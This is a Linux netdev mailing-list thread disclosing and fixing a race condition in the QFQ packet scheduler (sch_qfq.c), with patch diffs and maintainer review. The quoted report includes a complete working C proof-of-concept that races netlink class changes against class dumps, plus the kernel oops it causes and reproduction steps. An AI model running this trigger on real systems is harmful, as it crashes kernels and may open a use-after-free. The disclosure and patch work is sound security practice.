> > >         inv_w = ONE_FP / weight;
> > >         weight = ONE_FP / inv_w;
> > >
> > > -       if (cl != NULL &&
> > > -          lmax == cl->agg->lmax &&
> > > -          weight == cl->agg->class_weight)
> > > -               return 0; /* nothing to change */
> > > +       if(cl != NULL){
> > > +               sch_tree_lock(sch);
> > > +               old_weight = cl->agg->class_weight;
> > > +               old_lmax   = cl->agg->lmax;
> > > +               sch_tree_unlock(sch);
> > > +               if (lmax == old_lmax && weight == old_weight)
> > > +                       return 0; /* nothing to change */
> > > +       }
> > >
> > > -       delta_w = weight - (cl ? cl->agg->class_weight : 0);
> > > +       delta_w = weight - (cl ? old_weight : 0);
> > >
> > >         if (q->wsum + delta_w > QFQ_MAX_WSUM) {
> > >                 NL_SET_ERR_MSG_FMT_MOD(extack,
> > > @@ -555,10 +559,10 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
> > >
> > >         qdisc_purge_queue(cl->qdisc);
> > >         qdisc_class_hash_remove(&q->clhash, &cl->common);
> > > +       qfq_destroy_class(sch, cl);
> > >
> > >         sch_tree_unlock(sch);
> > >
> > > -       qfq_destroy_class(sch, cl);
> > >         return 0;
> > >  }
> > >
> > > @@ -625,6 +629,8 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
> > >  {
> > >         struct qfq_class *cl = (struct qfq_class *)arg;
> > >         struct nlattr *nest;
> > > +       u32 class_weight;
> > > +       u32 lmax;
> > >
> > >         tcm->tcm_parent = TC_H_ROOT;
> > >         tcm->tcm_handle = cl->common.classid;
> > > @@ -633,8 +639,12 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
> > >         nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
> > >         if (nest == NULL)
> > >                 goto nla_put_failure;
> > > -       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, cl->agg->class_weight) ||
> > > -          nla_put_u32(skb, TCA_QFQ_LMAX, cl->agg->lmax))
> > > +       sch_tree_lock(sch);
> > > +       class_weight = cl->agg->class_weight;
> > > +       lmax         = cl->agg->lmax;
> > > +       sch_tree_unlock(sch);
> > > +       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, class_weight) ||
> > > +          nla_put_u32(skb, TCA_QFQ_LMAX, lmax))
> > >                 goto nla_put_failure;
> > >         return nla_nest_end(skb, nest);
> > >
> > > @@ -651,8 +661,10 @@ static int qfq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
> > >
> > >         memset(&xstats, 0, sizeof(xstats));
> > >
> > > +       sch_tree_lock(sch);
> > >         xstats.weight = cl->agg->class_weight;
> > >         xstats.lmax = cl->agg->lmax;
> > > +       sch_tree_unlock(sch);
> > >
> > >         if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
> > >            gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
> > > --
> > > 2.43.0
> > > ```
> > >
> > > Here is the PoC triggering the race condition for your reference:
> > >
> > > ```c
> > > #include <stdio.h>
> > > #include <sys/socket.h>
> > > #include <linux/rtnetlink.h>
> > > #include <linux/pkt_sched.h>
> > > #include <linux/if_arp.h>
> > > struct tf_msg {
> > >     struct nlmsghdr nlh;
> > >     struct tcmsg tcm;
> > > #define TC_DATA_LEN 0x200
> > >     char attrbuf[TC_DATA_LEN];
> > > };
> > > struct if_msg {
> > >     struct nlmsghdr nlh;
> > >     struct ifinfomsg ifi;
> > > };
> > > typedef unsigned int u32;
> > > int nl, inet_sock_fd;
> > > char *  msgQdiscCreate;
> > > char *  tclass_0x20001_create;
> > > char *  tclass_0x20002_create;
> > > char *  tclass_0x20001_reset;
> > >
> > > unsigned short add_rtattr (unsigned long rta_addr, unsigned short type, unsigned short len, char *data) {
> > >     struct rtattr *rta = (struct rtattr *)rta_addr;
> > >     rta->rta_type = type;
> > >     rta->rta_len = RTA_LENGTH(len);
> > >     memcpy(RTA_DATA(rta), data, len);
> > >     return rta->rta_len;
> > > }
> > > int initNL(){
> > >     struct if_msg if_up_msg = {
> > >         {
> > >             .nlmsg_len = 32,
> > >             .nlmsg_type = RTM_NEWLINK,
> > >             .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
> > >         },
> > >         {
> > >             .ifi_family = AF_UNSPEC,
> > >             .ifi_type = ARPHRD_NETROM,
> > >             .ifi_index = 1,
> > >             .ifi_flags = IFF_UP,
> > >             .ifi_change = 1,
> > >         },
> > >     };
> > >     int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
> > >     if_up_msg.ifi.ifi_index = if_nametoindex("lo");
> > >     NLMsgSend(nl_sock_fd, (struct tf_msg *)(&if_up_msg));
> > >     return nl_sock_fd;
> > > }
> > > void NLMsgSend (int sock, struct tf_msg *m) {
> > >     struct {
> > >         struct nlmsghdr nh;
> > >         struct nlmsgerr ne;
> > >     } ack;
> > >     write(sock, m, m->nlh.nlmsg_len);
> > >     read(sock , &ack, sizeof(ack));
> > > }
> > > /* Prepared Values*/
> > > void init_loopbacksend (u32 prio) {
> > >     struct sockaddr iaddr = { AF_INET };
> > >     inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0);
> > >     int res = setsockopt(inet_sock_fd, SOL_SOCKET, SO_PRIORITY, &prio, sizeof(prio));
> > >     connect(inet_sock_fd, &iaddr, sizeof(iaddr));
> > > }
> > >
> > > /* Trafic control for netlink */
> > > void init_tf_msg (struct tf_msg *m) {
> > >     m->nlh.nlmsg_len    = NLMSG_LENGTH(sizeof(m->tcm));
> > >     m->nlh.nlmsg_type   = 0;    // Default Value
> > >     m->nlh.nlmsg_flags  = NLM_F_REQUEST | NLM_F_ACK;
> > >     m->nlh.nlmsg_seq    = 0;    // Default Value
> > >     m->nlh.nlmsg_pid    = 0;    // Default Value
> > >
> > >     // tcmsg
> > >     m->tcm.tcm_family   = PF_UNSPEC;
> > >     m->tcm.tcm_ifindex  = if_nametoindex("lo");
> > >     m->tcm.tcm_handle   = 0;    // Default Value
> > >     m->tcm.tcm_parent   = -1;   // Default Value for no parent
> > >     m->tcm.tcm_info     = 0;    // Default Value
> > > }
> > >
> > > struct tf_msg * classGet(u32 classid){
> > >     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
> > >     init_tf_msg(m);
> > >     m->nlh.nlmsg_type        = RTM_GETTCLASS;
> > >     m->tcm.tcm_handle        = classid;
> > >     return m;
> > > }
> > > struct tf_msg * qfqQdiscAdd(u32 handle, u32 parent) {
> > >     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
> > >     init_tf_msg(m);
> > >     m->nlh.nlmsg_type    = RTM_NEWQDISC;
> > >     m->nlh.nlmsg_flags   |= NLM_F_CREATE;
> > >     m->tcm.tcm_handle    = handle;
> > >     m->tcm.tcm_parent    = parent;
> > >     m->nlh.nlmsg_len     += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
> > >     return m;
> > > }
> > > struct tf_msg * qfqClassAdd(int type, u32 classid,u32 val){
> > >     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
> > >     init_tf_msg(m);
> > >     m->nlh.nlmsg_type       = RTM_NEWTCLASS;
> > >     m->tcm.tcm_parent       = 0;
> > >     m->tcm.tcm_handle       = classid;
> > >     m->nlh.nlmsg_flags      |= NLM_F_CREATE;
> > >     m->nlh.nlmsg_len        += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
> > >
> > >     struct rtattr *opts     = (struct rtattr *)((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len));
> > >     opts->rta_type          = TCA_OPTIONS;
> > >     opts->rta_len           = RTA_LENGTH(0);
> > >
> > >     if(type == TCA_QFQ_LMAX)
> > >         opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_LMAX, sizeof(val), (char *)&val));
> > >     else if(type == TCA_QFQ_WEIGHT)
> > >         opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_WEIGHT, sizeof(val), (char *)&val));
> > >     m->nlh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
> > >     return m;
> > > }
> > > void initContext(){
> > >     msgQdiscCreate =        qfqQdiscAdd(0x20000,-1);
> > >     tclass_0x20001_reset  = tclass_0x20001_create = qfqClassAdd(TCA_QFQ_LMAX,0x20001,0x200);
> > >     tclass_0x20002_create = qfqClassAdd(TCA_QFQ_LMAX,0x20002,0x400);
> > > }
> > > int main(){
> > >     initContext();
> > >     nl = initNL();
> > >     NLMsgSend(nl,msgQdiscCreate);
> > >     NLMsgSend(nl,tclass_0x20001_create);
> > >     NLMsgSend(nl,tclass_0x20002_create);
> > >     init_loopbacksend(0x20001);
> > >     if(fork()){
> > >         while(1){
> > >             write(inet_sock_fd, "", 0x400-42); // upgrade
> > >             NLMsgSend(nl,tclass_0x20001_reset);
> > >         }
> > >     }else{
> > >         char * pay = classGet(0x20001);
> > >         while(1)
> > >             NLMsgSend(nl,pay);
> > >     }
> > > }
> > >
> > > /*
> > > [    1.078863] BUG: kernel NULL pointer dereference, address: 0000000000000028
> > > [    1.079284] #PF: supervisor read access in kernel mode
> > > [    1.079580] #PF: error_code(0x0000) - not-present page
> > > [    1.079882] PGD 101e10067 P4D 101e10067 PUD 101e11067 PMD 0
> > > [    1.080211] Oops: 0000 [#1] PREEMPT SMP NOPTI
> > > [    1.080466] CPU: 1 PID: 117 Comm: exploit Not tainted 6.6.94 #1
> > > [    1.080873] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
> > > [    1.081426] RIP: 0010:qfq_dump_class+0x7f/0x120
> > > [    1.081700] Code: 2b 95 ff 85 c0 0f 88 a3 00 00 00 4d 85 e4 0f 84 9a 00 00 00 48 8b 45 68 48 8d 4c 24 04 ba 04 00 00 00 48 89 df be 01 00 00 00 <8b> 40 28 89 44 24 04 e8 c5 2b 95 ff 85 c0 75 5b 48 8b 45 68 48 8d
> > > [    1.082747] RSP: 0018:ffffc900004975b0 EFLAGS: 00010282
> > > [    1.083050] RAX: 0000000000000000 RBX: ffff8881013e7100 RCX: ffffc900004975b4
> > > [    1.083447] RDX: 0000000000000004 RSI: 0000000000000001 RDI: ffff8881013e7100
> > > [    1.083846] RBP: ffff888100b90380 R08: 0000000000000014 R09: ffff88810177e030
> > > [    1.084238] R10: 00000000000381a0 R11: ffff888101fd8000 R12: ffff88810177e02c
> > > [    1.084645] R13: ffff88810177e000 R14: ffffffff82d662a0 R15: ffff888101fd8000
> > > [    1.085072] FS:  00000000198fe3c0(0000) GS:ffff88811c500000(0000) knlGS:0000000000000000
> > > [    1.085557] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > > [    1.085888] CR2: 0000000000000028 CR3: 000000010168e000 CR4: 0000000000750ee0
> > > [    1.086329] PKRU: 55555554
> > > [    1.086491] Call Trace:
> > > [    1.086645]  <TASK>
> > > [    1.086777]  tc_fill_tclass+0x145/0x240
> > > [    1.087008]  tclass_notify.constprop.0+0x6a/0xd0
> > > [    1.087275]  tc_ctl_tclass+0x3bc/0x5a0
> > > [    1.087496]  rtnetlink_rcv_msg+0x14e/0x3d0
> > > [    1.087734]  ? kmem_cache_alloc_node+0x4b/0x520
> > > [    1.088011]  ? __pfx_rtnetlink_rcv_msg+0x10/0x10
> > > [    1.088281]  netlink_rcv_skb+0x57/0x100
> > > [    1.088506]  netlink_unicast+0x247/0x390
> > > [    1.088733]  netlink_sendmsg+0x250/0x4d0
> > > [    1.088964]  sock_write_iter+0x199/0x1a0
> > > [    1.089192]  vfs_write+0x393/0x440
> > > [    1.089396]  ksys_write+0xb7/0xf0
> > > [    1.089591]  do_syscall_64+0x5e/0x90
> > > [    1.089801]  ? do_syscall_64+0x6a/0x90
> > > [    1.090022]  ? netlink_rcv_skb+0x84/0x100
> > > [    1.090254]  ? kmem_cache_free+0x1e/0x360
> > > [    1.090484]  ? kmem_cache_free+0x1e/0x360
> > > [    1.090713]  ? netlink_unicast+0x252/0x390
> > > [    1.090953]  ? netlink_sendmsg+0x25d/0x4d0
> > > [    1.091189]  ? sock_write_iter+0x199/0x1a0
> > > [    1.091425]  ? vfs_write+0x393/0x440
> > > [    1.091633]  ? exit_to_user_mode_prepare+0x1a/0x150
> > > [    1.091915]  ? syscall_exit_to_user_mode+0x27/0x40
> > > [    1.092190]  ? do_syscall_64+0x6a/0x90
> > > [    1.092407]  ? exit_to_user_mode_prepare+0x1a/0x150
> > > [    1.092686]  ? syscall_exit_to_user_mode+0x27/0x40
> > > [    1.092962]  ? do_syscall_64+0x6a/0x90
> > > [    1.093180]  ? do_syscall_64+0x6a/0x90
> > > [    1.093397]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.093620]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.093842]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.094066]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.094287]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.094508]  entry_SYSCALL_64_after_hwframe+0x78/0xe2
> > > */
> > > ```
> > >
> > > >
> > > > cheers,
> > > > jamal
> > > >
> > > >
> > > > > Thanks,
> > > > > Xiang Mei

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)
  2025-06-30 23:09         ` Cong Wang
  2025-07-01  2:52           ` Xiang Mei
@ 2025-07-02 19:41           ` Xiang Mei
  2025-07-04  4:55             ` Cong Wang
  1 sibling, 1 reply; 26+ messages in thread
From: Xiang Mei @ 2025-07-02 19:41 UTC (permalink / raw)
  To: Cong Wang; +Cc: Jamal Hadi Salim, security, Linux Kernel Network Developers

On Mon, Jun 30, 2025 at 4:09 PM Cong Wang <xiyou.wangcong@gmail.com> wrote:
>
> Hi Xiang,
>
> On Mon, Jun 30, 2025 at 11:49:02AM -0700, Xiang Mei wrote:
> > Thank you very much for your time. We've re-tested the PoC and
> > confirmed it works on the latest kernels (6.12.35, 6.6.95, and
> > 6.16-rc4).
> >
> > To help with reproduction, here are a few notes that might be useful:
> > 1. The QFQ scheduler needs to be compiled into the kernel:
> >     $ scripts/config --enable CONFIG_NET_SCHED
> >     $ scripts/config --enable CONFIG_NET_SCH_QFQ
> > 2. Since this is a race condition, the test environment should have at
> > least two cores (e.g., -smp cores=2 for QEMU).
> > 3. The PoC was compiled using: `gcc ./poc.c -o ./poc  -w --static`
> > 4. Before running the PoC, please check that the network interface
> > "lo" is in the "up" state.
> >
> > Appreciate your feedback and patience.
>
> Thanks for your detailed report and efforts on reproducing it on the
> latest kernel.
>
> I think we may have a bigger problem here, the sch_tree_lock() is to lock
> the datapath, I doubt we really need to use sch_tree_lock() for
> qfq->agg. _If_ it is only for control path, using RTNL lock + RCU lock
> should be sufficient. We need a deeper review on the locking there.

My experience focused on vulnerability exploitation, and I am very new
to RCU. I have some questions about the possible RCU solution to this
vulnerability:

qfq->agg is used in both data path (qfq_change_agg was called in
qfq_enqueue) and control path, which is not protected by RTNL lock.
Does that mean we should use rcu_dereference_bh instead of
rcu_dereference_rtnl or rcu_dereference?


>
> Regards,
> Cong

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)
  2025-07-02 19:41           ` Xiang Mei
@ 2025-07-04  4:55             ` Cong Wang
  2025-07-05 22:39               ` [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate Xiang Mei
  0 siblings, 1 reply; 26+ messages in thread
From: Cong Wang @ 2025-07-04  4:55 UTC (permalink / raw)
  To: Xiang Mei; +Cc: Jamal Hadi Salim, security, Linux Kernel Network Developers

On Wed, Jul 02, 2025 at 12:41:36PM -0700, Xiang Mei wrote:
> On Mon, Jun 30, 2025 at 4:09 PM Cong Wang <xiyou.wangcong@gmail.com> wrote:
> >
> > Hi Xiang,
> >
> > On Mon, Jun 30, 2025 at 11:49:02AM -0700, Xiang Mei wrote:
> > > Thank you very much for your time. We've re-tested the PoC and
> > > confirmed it works on the latest kernels (6.12.35, 6.6.95, and
> > > 6.16-rc4).
> > >
> > > To help with reproduction, here are a few notes that might be useful:
> > > 1. The QFQ scheduler needs to be compiled into the kernel:
> > >     $ scripts/config --enable CONFIG_NET_SCHED
> > >     $ scripts/config --enable CONFIG_NET_SCH_QFQ
> > > 2. Since this is a race condition, the test environment should have at
> > > least two cores (e.g., -smp cores=2 for QEMU).
> > > 3. The PoC was compiled using: `gcc ./poc.c -o ./poc  -w --static`
> > > 4. Before running the PoC, please check that the network interface
> > > "lo" is in the "up" state.
> > >
> > > Appreciate your feedback and patience.
> >
> > Thanks for your detailed report and efforts on reproducing it on the
> > latest kernel.
> >
> > I think we may have a bigger problem here, the sch_tree_lock() is to lock
> > the datapath, I doubt we really need to use sch_tree_lock() for
> > qfq->agg. _If_ it is only for control path, using RTNL lock + RCU lock
> > should be sufficient. We need a deeper review on the locking there.
> 
> My experience focused on vulnerability exploitation, and I am very new
> to RCU. I have some questions about the possible RCU solution to this
> vulnerability:
> 
> qfq->agg is used in both data path (qfq_change_agg was called in
> qfq_enqueue) and control path, which is not protected by RTNL lock.
> Does that mean we should use rcu_dereference_bh instead of
> rcu_dereference_rtnl or rcu_dereference?

Good finding! I think this is probably the reason why we are using
sch_tree_lock().

I have to say updating agg in enqueue() looks weird and anti-pattern,
but changing this requires more efforts, so we may have to defer it to
long term.

So, if we have to take sch_tree_lock(), what does your final patch look
like?

Thanks.

^ permalink raw reply	[flat|nested] 26+ messages in thread

* [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-04  4:55             ` Cong Wang
@ 2025-07-05 22:39               ` Xiang Mei
  2025-07-05 22:49                 ` Xiang Mei
                                   ` (2 more replies)
  0 siblings, 3 replies; 26+ messages in thread
From: Xiang Mei @ 2025-07-05 22:39 UTC (permalink / raw)
  To: xiyou.wangcong; +Cc: netdev, gregkh, jhs, jiri, security, Xiang Mei

A race condition can occur when 'agg' is modified in qfq_change_agg
(called during qfq_enqueue) while other threads access it
concurrently. For example, qfq_dump_class may trigger a NULL
dereference, and qfq_delete_class may cause a use-after-free.

This patch addresses the issue by:

1. Moved qfq_destroy_class into the critical section.

2. Added sch_tree_lock protection to qfq_dump_class and
qfq_dump_class_stats.

Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
v1: Apply sch_tree_lock to avoid race conditions on qfq_aggregate.

 net/sched/sch_qfq.c | 30 +++++++++++++++++++++---------
 1 file changed, 21 insertions(+), 9 deletions(-)

diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
index 5e557b960..a2b321fec 100644
--- a/net/sched/sch_qfq.c
+++ b/net/sched/sch_qfq.c
@@ -412,7 +412,7 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
 	bool existing = false;
 	struct nlattr *tb[TCA_QFQ_MAX + 1];
 	struct qfq_aggregate *new_agg = NULL;
-	u32 weight, lmax, inv_w;
+	u32 weight, lmax, inv_w, old_weight, old_lmax;
 	int err;
 	int delta_w;
 
@@ -446,12 +446,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
 	inv_w = ONE_FP / weight;
 	weight = ONE_FP / inv_w;
 
-	if (cl != NULL &&
-	    lmax == cl->agg->lmax &&
-	    weight == cl->agg->class_weight)
-		return 0; /* nothing to change */
+	if (cl != NULL) {
+		sch_tree_lock(sch);
+		old_weight = cl->agg->class_weight;
+		old_lmax   = cl->agg->lmax;
+		sch_tree_unlock(sch);
+		if (lmax == old_lmax && weight == old_weight)
+			return 0; /* nothing to change */
+	}
 
-	delta_w = weight - (cl ? cl->agg->class_weight : 0);
+	delta_w = weight - (cl ? old_weight : 0);
 
 	if (q->wsum + delta_w > QFQ_MAX_WSUM) {
 		NL_SET_ERR_MSG_FMT_MOD(extack,
@@ -558,10 +562,10 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
 
 	qdisc_purge_queue(cl->qdisc);
 	qdisc_class_hash_remove(&q->clhash, &cl->common);
+	qfq_destroy_class(sch, cl);
 
 	sch_tree_unlock(sch);
 
-	qfq_destroy_class(sch, cl);
 	return 0;
 }
 
@@ -628,6 +632,7 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
 {
 	struct qfq_class *cl = (struct qfq_class *)arg;
 	struct nlattr *nest;
+	u32 class_weight, lmax;
 
 	tcm->tcm_parent	= TC_H_ROOT;
 	tcm->tcm_handle	= cl->common.classid;
@@ -636,8 +641,13 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
 	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
 	if (nest == NULL)
 		goto nla_put_failure;
-	if (nla_put_u32(skb, TCA_QFQ_WEIGHT, cl->agg->class_weight) ||
-	    nla_put_u32(skb, TCA_QFQ_LMAX, cl->agg->lmax))
+
+	sch_tree_lock(sch);
+	class_weight	= cl->agg->class_weight;
+	lmax		= cl->agg->lmax;
+	sch_tree_unlock(sch);
+	if (nla_put_u32(skb, TCA_QFQ_WEIGHT, class_weight) ||
+	    nla_put_u32(skb, TCA_QFQ_LMAX, lmax))
 		goto nla_put_failure;
 	return nla_nest_end(skb, nest);
 
@@ -654,8 +664,10 @@ static int qfq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
 
 	memset(&xstats, 0, sizeof(xstats));
 
+	sch_tree_lock(sch);
 	xstats.weight = cl->agg->class_weight;
 	xstats.lmax = cl->agg->lmax;
+	sch_tree_unlock(sch);
 
 	if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
 	    gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 26+ messages in thread

* Re: [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-05 22:39               ` [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate Xiang Mei
@ 2025-07-05 22:49                 ` Xiang Mei
  2025-07-07 18:05                   ` Cong Wang
  2025-07-07 17:58                 ` Jakub Kicinski
  2025-07-07 18:03                 ` Cong Wang
  2 siblings, 1 reply; 26+ messages in thread
From: Xiang Mei @ 2025-07-05 22:49 UTC (permalink / raw)
  To: xiyou.wangcong; +Cc: netdev, gregkh, jhs, jiri, security

Hi Cong,

This is a sch_tree_lock version of the patch. I agree with your point
that it's unusual to use sch_tree_lock for aggregation. What do you
think about applying RCU locks on agg pointers and using
rcu_dereference_bh?

Thanks,
Xiang


On Sat, Jul 5, 2025 at 3:40 PM Xiang Mei <xmei5@asu.edu> wrote:
>
> A race condition can occur when 'agg' is modified in qfq_change_agg
> (called during qfq_enqueue) while other threads access it
> concurrently. For example, qfq_dump_class may trigger a NULL
> dereference, and qfq_delete_class may cause a use-after-free.
>
> This patch addresses the issue by:
>
> 1. Moved qfq_destroy_class into the critical section.
>
> 2. Added sch_tree_lock protection to qfq_dump_class and
> qfq_dump_class_stats.
>
> Signed-off-by: Xiang Mei <xmei5@asu.edu>
> ---
> v1: Apply sch_tree_lock to avoid race conditions on qfq_aggregate.
>
>  net/sched/sch_qfq.c | 30 +++++++++++++++++++++---------
>  1 file changed, 21 insertions(+), 9 deletions(-)
>
> diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
> index 5e557b960..a2b321fec 100644
> --- a/net/sched/sch_qfq.c
> +++ b/net/sched/sch_qfq.c
> @@ -412,7 +412,7 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
>         bool existing = false;
>         struct nlattr *tb[TCA_QFQ_MAX + 1];
>         struct qfq_aggregate *new_agg = NULL;
> -       u32 weight, lmax, inv_w;
> +       u32 weight, lmax, inv_w, old_weight, old_lmax;
>         int err;
>         int delta_w;
>
> @@ -446,12 +446,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
>         inv_w = ONE_FP / weight;
>         weight = ONE_FP / inv_w;
>
> -       if (cl != NULL &&
> -           lmax == cl->agg->lmax &&
> -           weight == cl->agg->class_weight)
> -               return 0; /* nothing to change */
> +       if (cl != NULL) {
> +               sch_tree_lock(sch);
> +               old_weight = cl->agg->class_weight;
> +               old_lmax   = cl->agg->lmax;
> +               sch_tree_unlock(sch);
> +               if (lmax == old_lmax && weight == old_weight)
> +                       return 0; /* nothing to change */
> +       }
>
> -       delta_w = weight - (cl ? cl->agg->class_weight : 0);
> +       delta_w = weight - (cl ? old_weight : 0);
>
>         if (q->wsum + delta_w > QFQ_MAX_WSUM) {
>                 NL_SET_ERR_MSG_FMT_MOD(extack,
> @@ -558,10 +562,10 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
>
>         qdisc_purge_queue(cl->qdisc);
>         qdisc_class_hash_remove(&q->clhash, &cl->common);
> +       qfq_destroy_class(sch, cl);
>
>         sch_tree_unlock(sch);
>
> -       qfq_destroy_class(sch, cl);
>         return 0;
>  }
>
> @@ -628,6 +632,7 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
>  {
>         struct qfq_class *cl = (struct qfq_class *)arg;
>         struct nlattr *nest;
> +       u32 class_weight, lmax;
>
>         tcm->tcm_parent = TC_H_ROOT;
>         tcm->tcm_handle = cl->common.classid;
> @@ -636,8 +641,13 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
>         nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
>         if (nest == NULL)
>                 goto nla_put_failure;
> -       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, cl->agg->class_weight) ||
> -           nla_put_u32(skb, TCA_QFQ_LMAX, cl->agg->lmax))
> +
> +       sch_tree_lock(sch);
> +       class_weight    = cl->agg->class_weight;
> +       lmax            = cl->agg->lmax;
> +       sch_tree_unlock(sch);
> +       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, class_weight) ||
> +           nla_put_u32(skb, TCA_QFQ_LMAX, lmax))
>                 goto nla_put_failure;
>         return nla_nest_end(skb, nest);
>
> @@ -654,8 +664,10 @@ static int qfq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
>
>         memset(&xstats, 0, sizeof(xstats));
>
> +       sch_tree_lock(sch);
>         xstats.weight = cl->agg->class_weight;
>         xstats.lmax = cl->agg->lmax;
> +       sch_tree_unlock(sch);
>
>         if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
>             gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
> --
> 2.43.0
>

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-05 22:39               ` [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate Xiang Mei
  2025-07-05 22:49                 ` Xiang Mei
@ 2025-07-07 17:58                 ` Jakub Kicinski
  2025-07-07 23:42                   ` Xiang Mei
  2025-07-07 18:03                 ` Cong Wang
  2 siblings, 1 reply; 26+ messages in thread
From: Jakub Kicinski @ 2025-07-07 17:58 UTC (permalink / raw)
  To: Xiang Mei; +Cc: xiyou.wangcong, netdev, gregkh, jhs, jiri, security

On Sat,  5 Jul 2025 15:39:58 -0700 Xiang Mei wrote:
> A race condition can occur when 'agg' is modified in qfq_change_agg
> (called during qfq_enqueue) while other threads access it
> concurrently. For example, qfq_dump_class may trigger a NULL
> dereference, and qfq_delete_class may cause a use-after-free.

Please don't post patches in reply to threads.
Add a link to the thread using the Link: marker instead.
You're also missing a Fixes tag here.

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-05 22:39               ` [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate Xiang Mei
  2025-07-05 22:49                 ` Xiang Mei
  2025-07-07 17:58                 ` Jakub Kicinski
@ 2025-07-07 18:03                 ` Cong Wang
  2025-07-08  0:05                   ` Xiang Mei
  2025-07-09 18:06                   ` [PATCH v2] " Xiang Mei
  2 siblings, 2 replies; 26+ messages in thread
From: Cong Wang @ 2025-07-07 18:03 UTC (permalink / raw)
  To: Xiang Mei; +Cc: netdev, gregkh, jhs, jiri, security

On Sat, Jul 05, 2025 at 03:39:58PM -0700, Xiang Mei wrote:
> A race condition can occur when 'agg' is modified in qfq_change_agg
> (called during qfq_enqueue) while other threads access it
> concurrently. For example, qfq_dump_class may trigger a NULL
> dereference, and qfq_delete_class may cause a use-after-free.
> 
> This patch addresses the issue by:
> 
> 1. Moved qfq_destroy_class into the critical section.
> 
> 2. Added sch_tree_lock protection to qfq_dump_class and
> qfq_dump_class_stats.
> 
> Signed-off-by: Xiang Mei <xmei5@asu.edu>

Although holding sch_tree_lock() for control path is generally not
elegant, this is clearly not your fault, the current code is already so.
Converting to RCU requires more efforts, so it should be deferred to
long term (net-next).

So as a bug fix, this patch is okay.

Reviewed-by: Cong Wang <xiyou.wangcong@gmail.com>

(I assume you tested it with all tdc selftests.)

Thanks!

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-05 22:49                 ` Xiang Mei
@ 2025-07-07 18:05                   ` Cong Wang
  0 siblings, 0 replies; 26+ messages in thread
From: Cong Wang @ 2025-07-07 18:05 UTC (permalink / raw)
  To: Xiang Mei; +Cc: netdev, gregkh, jhs, jiri, security

On Sat, Jul 05, 2025 at 03:49:41PM -0700, Xiang Mei wrote:
> Hi Cong,
> 
> This is a sch_tree_lock version of the patch. I agree with your point
